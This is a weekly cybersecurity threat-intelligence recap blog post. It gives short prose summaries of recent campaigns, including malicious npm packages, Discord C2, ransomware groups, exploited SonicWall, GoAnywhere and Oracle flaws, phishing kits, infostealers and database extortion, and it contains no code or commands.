Threat Research | Weekly Recap [12 Oct 2025]

Cybersecurity Threat Research ‘Weekly’ Recap. The report highlights ongoing package-manager abuse, covert C2 channels, and extortion trends, including malicious npm packages, Discord-based C2, and double-extortion operations. It also covers high-severity vulnerabilities being actively exploited, phishing advancements, information-stealing and MaaS developments, and the rise of malware-less database ransomware, with emphasis on detection challenges and CTI considerations.
#Discord #SonicWall #CVEs #Qilin #RansomHub #Storm-2657 #ChaosBot #LummaStealer #GhostSocks #CastleRAT #XWorm #WhatsAppWorm #ClayRat #CryptoScam #DatabaseRansomware #NVD

Package-ecosystem & supply-chain abuse

Malicious packages across npm/PyPI/RubyGems used hard-coded Discord webhooks to exfiltrate files and secrets during install/runtime. Discord C2 in package registries.
175 npm packages served as coordinated phishing hosting (credential-harvesting redirects via unpkg.com) targeting 135+ orgs. 175 malicious npm packages host phishing infra.
Stealit distributed Node.js stealers using experimental Single Executable Application (SEA) and Electron, with obfuscation and commercialized C2 panels. Stealit abusing Node.js SEA/Electron.
Spoofed Homebrew installer sites copied brew.sh and injected hidden clipboard commands to install payloads (e.g., Odyssey Stealer). Homebrew spoofed sites inject malicious curl.

Covert C2 & platform abuse

Novel Rust backdoor “ChaosBot” and other malware used Discord as a C2 channel, supporting remote commands, file transfer, and proxying. ChaosBot Rust backdoor (Discord C2).

Ransomware & extortion operations

Scattered Lapsus$ hunters and affiliate groups (e.g., Bling Libra, Crimson Collective) steal cloud/SaaS data and offer extortion-as-a-service targeting retail, hospitality, and cloud providers. Bling Libra / Scattered Lapsus extortion-as-a-service.
Akira campaigns rapidly abuse SonicWall VPN flaws/credentials to move, harvest Veeam creds, exfiltrate and deploy ransomware in under an hour. Akira ransomware targeting SonicWall VPNs.
Gunra operates double-extortion campaigns focused outside the US, using stealers, loaders and public leak sites/negotiation portals to monetize theft. Gunra double-extortion operations.
Qilin (Rust-based RaaS) evolved with cross-platform targeting and advanced evasion; AttackIQ published emulations to validate defenses. Qilin RaaS: cross-platform emulation guidance.
Rapid RansomHub-linked intrusion (SocGhoulish) was contained by Varonis after multi-stage credential theft and AzCopy exfiltration with zero business downtime. RansomHub / SocGhoulish incident response (Varonis).

Access, exploits & critical vulnerability exploitation

Widespread SonicWall SSLVPN compromises observed (credential use, MySonicWall backup exposure); orgs urged to reset secrets and enforce MFA. SonicWall SSLVPN widespread compromise.
Active exploitation of GoAnywhere MFT deserialization (CVE-2025-10035, CVSS 10.0) used by threat actors to deploy RMM, rclone exfiltration, and ransomware. Active exploitation: GoAnywhere MFT CVE-2025-10035.
Oracle released fixes and IOCs for an unauthenticated RCE in E-Business Suite (CVE-2025-61882); immediate patching and hunting recommended. Oracle EBS unauthenticated RCE CVE-2025-61882.
RondoDox botnet used an “exploit shotgun” targeting 50+ CVEs to compromise routers, DVRs, NVRs and web servers worldwide. RondoDox exploit-shotgun botnet.

Phishing & social-engineering campaigns

ClickFix social-engineering was commoditized into an IUAM ClickFix Generator phishing kit delivering DeerStealer and Odyssey via spoofed browser-verification pages and clipboard injection. IUAM ClickFix Generator phishing kit.
Highly convincing invoice/W9 phishing targeted a Validin employee; investigators linked ~40 domains via template/hash and hosting patterns. Invoice/W9 phishing impersonating Ignitecore.
Q3 campaign impersonated major brands (Red Bull, Tesla, Google, Ferrari) to target marketing professionals with job-application credential harvesting. Job-offer phishing targeting marketing pros.
Targeted payroll pirate attacks (Storm-2657) used AITM phishing to steal MFA codes and redirect university payrolls via mailbox rules and Workday manipulation. Payroll redirect attacks (Storm-2657).
Scammers spoofed 1Password Watchtower with typosquatted domains and Mandrill redirects to harvest credentials. 1Password Watchtower fake-breach phishing.
Threat actors increasingly abuse Microsoft Teams features (chat/meetings/screenshare) across the attack chain for access, persistence, lateral movement, and extortion. Threats abusing Microsoft Teams collaboration.
China-aligned UTA0388 used LLM assistance to generate multilingual spear-phish lures and delivered GOVERSHELL via search-order hijacking. UTA0388: LLM-assisted targeted phishing.

Infostealers, loaders, MaaS & access brokers

Lumma Stealer resurfaced with obfuscation and AutoIt loaders; detection showcased via NSIS-signed sample analysis and ML-powered sandboxing. Lumma Stealer resurgence via NSIS installer.
GhostSocks MaaS converts compromised hosts into residential SOCKS5 proxies (partnering with stealers) to monetize access and bypass fraud controls. GhostSocks MaaS: victims as proxy nodes.
TAG-150 deployed CastleLoader/CastleBot and new CastleRAT variants (Python/C) via multi-tier infra and ClickFix/GitHub lures for reconnaissance and remote access. CastleRAT / CastleLoader campaigns (TAG-150).
XWorm v6 returned with modular plugins (RDP, file manager, ransomware plugin) and links to cracked builders and NoCry code. XWorm v6 modular RAT & plugins.

Messaging worms, banking trojans & mobile threats

A WhatsApp Web worm campaign in Brazil used ZIP→LNK→PowerShell chains to disable defenses and deliver a Selenium hijacker or Maverick banking trojan. WhatsApp Web worm delivering Maverick.
ClayRat Android spyware sideloaded via Telegram/phishing pages stole SMS, calls, notifications, photos and self-propagated to contacts once granted SMS handler privileges. ClayRat Android spyware via sideloading.

Crypto scams & fraud infrastructure

Coordinated crypto-scam network hosted fake wallet sites, malicious extension flows and profile “apps” to drain wallets; infrastructure and artifacts mapped to specific IPs/domains. Coordinated crypto-scam nexus & wallet phishing.

Database & infrastructure extortion (malware-less attacks)

Attackers increasingly perform “malware-less” database ransomware by abusing exposed/misconfigured DBs (MongoDB, Postgres, MySQL, Redis, Elasticsearch) with legitimate DB commands for theft/destruction and ransom notes. Malware-less database ransomware trends & defenses.

Detection, research, and threat intelligence quality

NVD suffered a backlog with ~70% of recent CVEs awaiting analysis, urging use of alternative vulnerability sources (OSV.dev, vendor advisories) for timely patching. Vulnerability data crisis in NVD & mitigations.
Kaspersky integrated an ML model into Kaspersky SIEM to detect DLL-hijacking (sideloading) and flagged real-world incidents (ToddyCat/Cobalt Strike, infostealer loaders). ML detection of DLL hijacking in SIEM.
LABScon25 replay cautions on AI-agent use in CTI: productivity gains vs reliability/transparency risks; calls for adapted tradecraft and clear AI-assisted reporting. AI agents in CTI: analytical tradecraft risks.
Elastic Security Labs’ 2025 Global Threat Report highlights AI-driven shifts, infostealer prevalence, and concentrated cloud attacks (Initial Access, Persistence, Credential Access). Elastic 2025 Global Threat Report.

Threat Research | Weekly Recap – hendryadrian.com

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print